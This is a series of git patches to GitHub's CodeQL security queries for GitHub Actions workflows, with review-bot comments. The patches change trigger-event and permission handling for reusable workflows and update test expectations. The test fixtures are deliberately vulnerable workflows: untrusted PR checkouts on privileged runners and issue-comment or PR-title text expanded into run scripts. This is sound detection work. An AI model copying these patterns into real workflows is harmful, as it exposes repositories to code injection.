payload: | + { + "blocks": [ + { + "type": "section", + "text": { + "type": "mrkdwn", + "text": "<@${{ steps.slack-id.outputs.slack-id }}>'s kickoff of <${{ github.event.issue.html_url }}|${{ steps.pipeline-info.outputs.mdl }}> model is complete!\n*Status: ${{ job.status }}*" + } + } + ] + } + env: + SLACK_BOT_TOKEN: ${{ secrets.SLACK_BOT_TOKEN }} + + - name: Prune docker images + run: docker system prune --all --force 
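Review bot: Nothing in this fixture says which verdict it is meant to pin, and the accompanying change to `UntrustedCheckoutCritical.expected` adds only `edges` rows for `test15.yml` and no `#select` row, so as far as this patch shows the workflow is recorded as a no-alert case. That deserves a header comment, because the push-time check lives only in the `security-checks` job, while `docker-environment-creation` and `kickoff-pipeline` resolve and check out `steps.comment-branch.outputs.head_ref` again on `[self-hosted, production]` runners and expand `${{ github.event.comment.body }}` directly inside `run:` scripts. The `if:` of `security-checks` also compares `github.event.pull_request.author_association`, a field the `issue_comment` payload normally does not carry, so those four comparisons are probably always true and should not be read as an association check. I would add a first line such as `# CWE-829 fixture: date check in security-checks, checkout repeated in dependent jobs; expected: <alert | no alert>` so the intent survives later changes to the query.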
diff --git a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected index d9cbfe804ae..4fbfca24126 100644 --- a/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected +++ b/ql/test/query-tests/Security/CWE-829/UntrustedCheckoutCritical.expected 
@@ -188,6 +188,43 @@ edges | .github/workflows/test13.yml:14:7:20:4 | Uses Step | .github/workflows/test13.yml:20:7:25:4 | Uses Step | | .github/workflows/test13.yml:20:7:25:4 | Uses Step | .github/workflows/test13.yml:25:7:28:4 | Uses Step | | .github/workflows/test13.yml:25:7:28:4 | Uses Step | .github/workflows/test13.yml:28:7:31:50 | Run Step | +| .github/workflows/test14.yml:38:7:41:4 | Uses Step | .github/workflows/test14.yml:41:7:44:4 | Run Step | +| .github/workflows/test14.yml:41:7:44:4 | Run Step | .github/workflows/test14.yml:44:7:58:4 | Run Step | +| .github/workflows/test14.yml:44:7:58:4 | Run Step | .github/workflows/test14.yml:58:7:76:2 | Run Step: environment | +| .github/workflows/test14.yml:90:7:94:4 | Uses Step: comment-branch | .github/workflows/test14.yml:94:7:101:4 | Uses Step | +| .github/workflows/test14.yml:94:7:101:4 | Uses Step | .github/workflows/test14.yml:101:7:105:4 | Uses Step | +| .github/workflows/test14.yml:101:7:105:4 | Uses Step | .github/workflows/test14.yml:105:7:111:4 | Uses Step | +| .github/workflows/test14.yml:105:7:111:4 | Uses Step | .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | +| .github/workflows/test14.yml:111:7:135:4 | Run Step: environment | .github/workflows/test14.yml:135:7:141:4 | Run Step: email | +| .github/workflows/test14.yml:135:7:141:4 | Run Step: email | .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | +| .github/workflows/test14.yml:141:7:149:4 | Run Step: slack-id | .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | +| .github/workflows/test14.yml:149:7:169:4 | Uses Step: slack-initiate | .github/workflows/test14.yml:169:7:174:4 | Uses Step | +| .github/workflows/test14.yml:169:7:174:4 | Uses Step | .github/workflows/test14.yml:174:7:187:4 | Run Step | +| .github/workflows/test14.yml:174:7:187:4 | Run Step | .github/workflows/test14.yml:187:7:198:4 | Run Step | +| .github/workflows/test14.yml:187:7:198:4 | Run Step | 
.github/workflows/test14.yml:198:7:206:4 | Uses Step | +| .github/workflows/test14.yml:198:7:206:4 | Uses Step | .github/workflows/test14.yml:206:7:226:4 | Uses Step | +| .github/workflows/test14.yml:206:7:226:4 | Uses Step | .github/workflows/test14.yml:226:7:227:45 | Run Step | +| .github/workflows/test15.yml:38:7:56:4 | Run Step: environment | .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | +| .github/workflows/test15.yml:56:7:60:4 | Uses Step: comment-branch | .github/workflows/test15.yml:60:7:65:4 | Uses Step | +| .github/workflows/test15.yml:60:7:65:4 | Uses Step | .github/workflows/test15.yml:65:7:68:4 | Uses Step | +| .github/workflows/test15.yml:65:7:68:4 | Uses Step | .github/workflows/test15.yml:68:7:83:2 | Run Step | +| .github/workflows/test15.yml:106:7:110:4 | Uses Step: comment-branch | .github/workflows/test15.yml:110:7:115:4 | Uses Step | +| .github/workflows/test15.yml:110:7:115:4 | Uses Step | .github/workflows/test15.yml:115:7:120:4 | Uses Step | +| .github/workflows/test15.yml:115:7:120:4 | Uses Step | .github/workflows/test15.yml:120:7:127:4 | Run Step | +| .github/workflows/test15.yml:120:7:127:4 | Run Step | .github/workflows/test15.yml:127:7:131:4 | Run Step | +| .github/workflows/test15.yml:127:7:131:4 | Run Step | .github/workflows/test15.yml:131:7:136:4 | Run Step | +| .github/workflows/test15.yml:131:7:136:4 | Run Step | .github/workflows/test15.yml:136:7:141:2 | Run Step | +| .github/workflows/test15.yml:169:7:173:4 | Uses Step: comment-branch | .github/workflows/test15.yml:173:7:180:4 | Uses Step | +| .github/workflows/test15.yml:173:7:180:4 | Uses Step | .github/workflows/test15.yml:180:7:185:4 | Uses Step | +| .github/workflows/test15.yml:180:7:185:4 | Uses Step | .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | +| .github/workflows/test15.yml:185:7:197:4 | Run Step: pipeline-info | .github/workflows/test15.yml:197:7:203:4 | Run Step: email | +| .github/workflows/test15.yml:197:7:203:4 | Run 
Step: email | .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | +| .github/workflows/test15.yml:203:7:211:4 | Run Step: slack-id | .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | +| .github/workflows/test15.yml:211:7:231:4 | Uses Step: slack-initiate | .github/workflows/test15.yml:231:7:236:4 | Uses Step | +| .github/workflows/test15.yml:231:7:236:4 | Uses Step | .github/workflows/test15.yml:236:7:242:4 | Run Step | +| .github/workflows/test15.yml:236:7:242:4 | Run Step | .github/workflows/test15.yml:242:7:250:4 | Uses Step | +| .github/workflows/test15.yml:242:7:250:4 | Uses Step | .github/workflows/test15.yml:250:7:270:4 | Uses Step | +| .github/workflows/test15.yml:250:7:270:4 | Uses Step | .github/workflows/test15.yml:270:7:271:45 | Run Step | | .github/workflows/test.yml:13:9:14:6 | Uses Step | .github/workflows/test.yml:14:9:25:6 | Run Step | | .github/workflows/test.yml:14:9:25:6 | Run Step | .github/workflows/test.yml:25:9:33:6 | Run Step | | .github/workflows/test.yml:25:9:33:6 | Run Step | .github/workflows/test.yml:33:9:37:34 | Run Step | From 610dcaf23dfe2915c6451dc565ddb5f16254e247 Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 12:31:19 +0200 Subject: [PATCH 0523/1267] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index b4c388cf615..84d4f5f3678 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: github/actions-all -version: 0.1.50 +version: 0.1.51 dependencies: codeql/util: ^1.0.1 codeql/yaml: ^1.0.1 diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index e5709a52329..0ef4c721e1a 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml 
@@ -1,7 +1,7 @@ --- library: false name: github/actions-queries -version: 0.1.50 +version: 0.1.51 groups: [actions, queries] suites: codeql-suites extractor: javascript From 2bfb1565086edc3ab56d7dd1e19fcb0055658c1d Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Mon, 23 Sep 2024 23:08:58 +0200 Subject: [PATCH 0524/1267] d /Users/pwntester/src/github.com/github/codeql-actions/ql --- ql/lib/codeql/actions/ast/internal/Ast.qll | 15 ++++++++++----- 1 file changed, 10 insertions(+), 5 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index d0eb440d0d5..7458cc1b053 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -416,6 +416,12 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } + override EventImpl getATriggerEvent() { + this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result + or + this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" + } + OutputsImpl getOutputs() { result.getNode() = workflow_call.(YamlMapping).lookup("outputs") } ExpressionImpl getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } 
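Review bot: The first disjunct of the new `getATriggerEvent()` override reads the caller's `on:` block directly (`getEnclosingWorkflow().getOn().getAnEvent()`), so when the caller is itself a reusable workflow the result is that caller's `workflow_call` event rather than the event that actually started the run. The job-level predicate changed in the next hunk goes through `getACaller().getATriggerEvent()` instead, and the two should agree; I would write the disjunct as `this.getACaller().getATriggerEvent() = result`. Because the trigger event decides which control checks and privilege rules apply, the mismatch probably surfaces as missed or unmatched events on nested reusable workflows, though `getACaller()` is defined outside the hunk. The override also has no QLDoc; `/** Gets a trigger event of a caller of this workflow, or one of its own triggers other than workflow_call. */` would cover it.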
@@ -796,12 +802,11 @@ class JobImpl extends AstNodeImpl, TJobNode { StrategyImpl getStrategy() { result.getNode() = n.lookup("strategy") } /** Gets the trigger event that starts this workflow. */ - EventImpl getATriggerEvent() { result = this.getEnclosingWorkflow().getATriggerEvent() } + EventImpl getATriggerEvent() { + result = this.getEnclosingWorkflow().getATriggerEvent() or + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + } - // private predicate hasSingleTrigger(string trigger) { - // this.getATriggerEvent().getName() = trigger and - // count(this.getATriggerEvent()) = 1 - // } /** Gets the runs-on field of the job. */ string getARunsOnLabel() { exists(ScalarValueImpl lbl, YamlMappingLikeNode runson | From fe06c9e5fa186e27fbe1e2134926b08982a9dfef Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Tue, 24 Sep 2024 12:12:09 +0200 Subject: [PATCH 0525/1267] d /Users/pwntester/src/github.com/github/codeql-actions/ql --- ql/lib/codeql/actions/ast/internal/Ast.qll | 64 +++++++++++++++++-- .../codeql/actions/security/ControlChecks.qll | 2 +- .../CWE-829/UntrustedCheckoutCritical.ql | 33 ++++------ .../Security/CWE-829/UntrustedCheckoutHigh.ql | 33 ++++------ .../.github/workflows/documentation.yml | 2 +- .../CWE-078/CommandInjectionCritical.expected | 2 - .../CWE-078/CommandInjectionMedium.expected | 1 - .../workflows/reusable-workflow-caller-1.yml | 4 +- .../workflows/reusable-workflow-caller-2.yml | 4 +- .../CWE-094/CodeInjectionCritical.expected | 12 ++-- .../CWE-094/CodeInjectionMedium.expected | 12 ++-- .../.github/workflows/reusable_caller3.yaml | 2 +- .../UntrustedCheckoutCritical.expected | 2 - .../CWE-829/UntrustedCheckoutHigh.expected | 4 -- .../CWE-829/UntrustedCheckoutMedium.expected | 6 ++ 15 files changed, 102 insertions(+), 81 deletions(-) diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 7458cc1b053..d05174f4787 100644 
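Review bot: The QLDoc kept above `JobImpl.getATriggerEvent()` still reads "Gets the trigger event that starts this workflow", but the predicate now also returns the trigger events of jobs that call the enclosing reusable workflow. I would update it to `/** Gets a trigger event of the enclosing workflow or, when that workflow is reusable, of any job that calls it. */` so that query authors know the result may come from a different file than the job.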
--- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -417,8 +417,10 @@ class ReusableWorkflowImpl extends AstNodeImpl, WorkflowImpl { override AstNodeImpl getAChildNode() { result.getNode() = n.getAChildNode*() } override EventImpl getATriggerEvent() { + // The trigger event for a reusable workflow is the trigger event of the caller workflow this.getACaller().getEnclosingWorkflow().getOn().getAnEvent() = result or + // or the trigger event of the workflow if it has any other than workflow_call this.getOn().getAnEvent() = result and not result.getName() = "workflow_call" } @@ -803,8 +805,13 @@ class JobImpl extends AstNodeImpl, TJobNode { /** Gets the trigger event that starts this workflow. */ EventImpl getATriggerEvent() { - result = this.getEnclosingWorkflow().getATriggerEvent() or - result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + if this.getEnclosingWorkflow() instanceof ReusableWorkflowImpl + then + result = this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getATriggerEvent() + or + result = this.getEnclosingWorkflow().getATriggerEvent() and + not result.getName() = "workflow_call" + else result = this.getEnclosingWorkflow().getATriggerEvent() } /** Gets the runs-on field of the job. */ @@ -844,9 +851,8 @@ class JobImpl extends AstNodeImpl, TJobNode { ) } - private predicate hasExplicitWritePermission() { - // the job has an explicit write permission - this.getPermissions().getAPermission().matches("%write") + private predicate hasExplicitNonePermission() { + exists(this.getPermissions()) and not exists(this.getPermissions().getAPermission()) } private predicate hasExplicitReadPermission() { 
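Review bot: After this rewrite of `JobImpl.getATriggerEvent()`, a job in a reusable workflow whose only trigger is `workflow_call` and which has no caller inside the analysed repository gets no trigger event at all, because the `then` branch yields only callers' events and own events other than `workflow_call`. The two untrusted-checkout queries in this patch now require `event = checkout.getEnclosingJob().getATriggerEvent()` in `where`, so such a job can no longer produce a result, whereas previously the `workflow_call` event itself presumably satisfied the "not issue_comment" branch. If that loss of coverage is intended it should be stated in the QLDoc, for example `/** Gets a trigger event of this job; a reusable workflow contributes only its callers' events and its own non-workflow_call triggers, so one called only from other repositories has none. */`. A fixture that pins this no-alert case would document it better than switching `documentation.yml` from `workflow_call` to `pull_request`.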
@@ -855,15 +861,57 @@ class JobImpl extends AstNodeImpl, TJobNode { not this.getPermissions().getAPermission().matches("%write") } - private predicate hasImplicitWritePermission() { + private predicate hasExplicitWritePermission() { // the job has an explicit write permission - this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + this.getPermissions().getAPermission().matches("%write") + } + + private predicate hasImplicitNonePermission() { + not exists(this.getPermissions()) and + exists(this.getEnclosingWorkflow().getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getPermissions()) and + not exists( + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + ) } private predicate hasImplicitReadPermission() { // the job has not an explicit write permission + not exists(this.getPermissions()) and exists(this.getEnclosingWorkflow().getPermissions().getAPermission()) and not this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%read") + } + + private predicate hasImplicitWritePermission() { + // the job has an explicit write permission + not exists(this.getPermissions()) and + this.getEnclosingWorkflow().getPermissions().getAPermission().matches("%write") + or + not exists(this.getPermissions()) and + not exists(this.getEnclosingWorkflow().getPermissions()) and + this.getEnclosingWorkflow() + .(ReusableWorkflowImpl) + .getACaller() + .getPermissions() + .getAPermission() + .matches("%write") } private 
predicate hasRuntimeData() { @@ -922,6 +970,8 @@ class JobImpl extends AstNodeImpl, TJobNode { // and the job is not explicitly non-privileged not ( ( + this.hasExplicitNonePermission() or + this.hasImplicitNonePermission() or this.hasExplicitReadPermission() or this.hasImplicitReadPermission() ) and diff --git a/ql/lib/codeql/actions/security/ControlChecks.qll b/ql/lib/codeql/actions/security/ControlChecks.qll index 1a47f4d92d0..1a3e1e15fe8 100644 --- a/ql/lib/codeql/actions/security/ControlChecks.qll +++ b/ql/lib/codeql/actions/security/ControlChecks.qll @@ -38,7 +38,7 @@ abstract class ControlCheck extends AstNode { } predicate protects(Step step, Event event, string category) { - event.getEnclosingWorkflow() = step.getEnclosingWorkflow() and + event = step.getEnclosingWorkflow().getATriggerEvent() and this.dominates(step) and this.protectsCategoryAndEvent(category, event.getName()) } diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql index 9efd9b036cd..31a4cdf94e5 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutCritical.ql 
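Review bot: In `hasImplicitReadPermission()` the new caller branch ends in `.getAPermission().matches("%read")`, which holds as soon as the caller grants any read scope, even when it also grants a write scope; the workflow-level branch just above it instead requires that no permission matches `%write`. A caller with mixed scopes then satisfies both the read and the write predicate, and since the read predicates feed the "explicitly non-privileged" exclusion in the following hunk, such a job may drop out of the privileged set (the rest of that condition is outside these hunks). I would mirror the first branch on the caller chain: `exists(this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getPermissions().getAPermission()) and not this.getEnclosingWorkflow().(ReusableWorkflowImpl).getACaller().getPermissions().getAPermission().matches("%write")`. The comments are stale as well: `hasImplicitWritePermission()` and `hasImplicitReadPermission()` both speak of an "explicit write permission" although they describe permissions inherited from the workflow or the caller.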
@@ -20,39 +20,28 @@ import codeql.actions.security.ControlChecks query predicate edges(Step a, Step b) { a.getNextStep() = b } -from PRHeadCheckoutStep checkout, PoisonableStep step +from PRHeadCheckoutStep checkout, PoisonableStep step, Event event where // the checkout is followed by a known poisonable step checkout.getAFollowingStep() = step and // the checkout occurs in a privileged context inPrivilegedContext(checkout) and + event = checkout.getEnclosingJob().getATriggerEvent() and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event event | - event = checkout.getEnclosingJob().getATriggerEvent() and + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( - event.getName() = "issue_comment" - or - event.getName() = "workflow_call" and - checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = - "issue_comment" + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck ) and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(checkout) and - date_check.dominates(checkout) - ) + check.dominates(checkout) and + date_check.dominates(checkout) ) or // not issue_comment triggered workflows - exists(Event event | - not event.getName() = "issue_comment" and - event = checkout.getEnclosingJob().getATriggerEvent() and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) - ) + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) select step, checkout, step, "Execution of untrusted code on a privileged workflow." 
diff --git a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql index ce138fb0478..bc6f0e36e56 100644 --- a/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql +++ b/ql/src/Security/CWE-829/UntrustedCheckoutHigh.ql 
@@ -18,39 +18,28 @@ import codeql.actions.security.UntrustedCheckoutQuery import codeql.actions.security.PoisonableSteps import codeql.actions.security.ControlChecks -from PRHeadCheckoutStep checkout +from PRHeadCheckoutStep checkout, Event event where // the checkout is NOT followed by a known poisonable step not checkout.getAFollowingStep() instanceof PoisonableStep and // the checkout occurs in a privileged context inPrivilegedContext(checkout) and + event = checkout.getEnclosingJob().getATriggerEvent() and ( // issue_comment: check for date comparison checks and actor/access control checks - exists(Event event | - event = checkout.getEnclosingJob().getATriggerEvent() and + event.getName() = "issue_comment" and + not exists(ControlCheck check, CommentVsHeadDateCheck date_check | ( - event.getName() = "issue_comment" - or - event.getName() = "workflow_call" and - checkout.getEnclosingWorkflow().(ReusableWorkflow).getACaller().getATriggerEvent().getName() = - "issue_comment" + check instanceof ActorCheck or + check instanceof AssociationCheck or + check instanceof PermissionCheck ) and - not exists(ControlCheck check, CommentVsHeadDateCheck date_check | - ( - check instanceof ActorCheck or - check instanceof AssociationCheck or - check instanceof PermissionCheck - ) and - check.dominates(checkout) and - date_check.dominates(checkout) - ) + check.dominates(checkout) and + date_check.dominates(checkout) ) or // not issue_comment triggered workflows - exists(Event event | - not event.getName() = "issue_comment" and - event = checkout.getEnclosingJob().getATriggerEvent() and - not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) - ) + not event.getName() = "issue_comment" and + not exists(ControlCheck check | check.protects(checkout, event, "untrusted-checkout")) ) select checkout, "Potential execution of untrusted code on a privileged workflow." 
diff --git a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml index 46ffbce9628..db04b69ac16 100644 --- a/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml +++ b/ql/test/query-tests/Security/CWE-078/.github/workflows/documentation.yml @@ -2,7 +2,7 @@ name: Documentation on: workflow_dispatch: - workflow_call: + pull_request: jobs: parse_commit_info: diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected index e2fe23cccc6..decabad082f 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionCritical.expected 
@@ -1,8 +1,6 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | ${{ github.event.comment.body }} | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | Potential command injection in $@, which may be controlled by an external user. | .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | ${{ github.event.head_commit.message }} | diff --git a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected index ebbf2f7cf0b..99ebb1edc05 100644 --- a/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected +++ b/ql/test/query-tests/Security/CWE-078/CommandInjectionMedium.expected @@ -1,6 +1,5 @@ edges nodes | .github/workflows/comment_issue.yml:9:26:9:57 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/documentation.yml:87:28:87:66 | github.event.head_commit.message | semmle.label | github.event.head_commit.message | subpaths #select 
diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml index 9c0b72dffea..a237856b6ce 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-1.yml @@ -1,11 +1,11 @@ name: Caller on: - issue_comment: + pull_request_target: jobs: test: permissions: {} uses: ./.github/workflows/reusable-workflow-1.yml with: - taint: ${{ github.event.comment.body }} + taint: ${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml index 46be8d7009d..0f87d1e9394 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml +++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/reusable-workflow-caller-2.yml @@ -1,10 +1,10 @@ name: Caller on: - issue_comment: + pull_request_target: jobs: test: uses: ./.github/workflows/reusable-workflow-2.yml with: - taint: ${{ github.event.comment.body }} + taint: ${{ github.event.pull_request.title }} diff --git a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected index 9ebd5508802..818b106b6d7 100644 --- a/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected +++ b/ql/test/query-tests/Security/CWE-094/CodeInjectionCritical.expected 
@@ -70,8 +70,8 @@ edges | .github/workflows/reusable-workflow-1.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:53:26:53:39 | env.log | provenance | | | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | provenance | | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | provenance | | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-1.yml:6:7:6:11 | input taint | provenance | | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | .github/workflows/reusable-workflow-2.yml:6:7:6:11 | input taint | provenance | | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | .github/workflows/self_needs.yml:20:15:20:51 | needs.test1.outputs.job_output | provenance | | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | provenance | | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | provenance | | 
@@ -287,8 +287,8 @@ nodes | .github/workflows/reusable-workflow-2.yml:36:21:36:39 | inputs.taint | semmle.label | inputs.taint | | .github/workflows/reusable-workflow-2.yml:44:19:44:56 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/reusable-workflow-2.yml:53:26:53:39 | env.log | semmle.label | env.log | -| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | semmle.label | github.event.comment.body | -| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:46 | github.event.comment.body | semmle.label | github.event.comment.body | +| .github/workflows/reusable-workflow-caller-1.yml:11:15:11:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | +| .github/workflows/reusable-workflow-caller-2.yml:10:15:10:52 | github.event.pull_request.title | semmle.label | github.event.pull_request.title | | .github/workflows/self_needs.yml:11:7:12:4 | Job outputs node [job_output] | semmle.label | Job outputs node [job_output] | | .github/workflows/self_needs.yml:11:20:11:52 | steps.source.outputs.value | semmle.label | steps.source.outputs.value | | .github/workflows/self_needs.yml:13:9:19:6 | Uses Step: source [value] | semmle.label | Uses Step: source [value] | 
@@ -451,9 +451,7 @@ subpaths | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:14:19:14:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:15:19:15:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | Potential code injection in $@, which may be controlled by an external user. | .github/workflows/pull_request_target.yml:16:19:16:40 | github.head_ref | ${{ github.head_ref }} | -| .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-1.yml:11:15:11:46 | github.event.comment.body | .github/workflows/reusable-workflow-1.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user. 
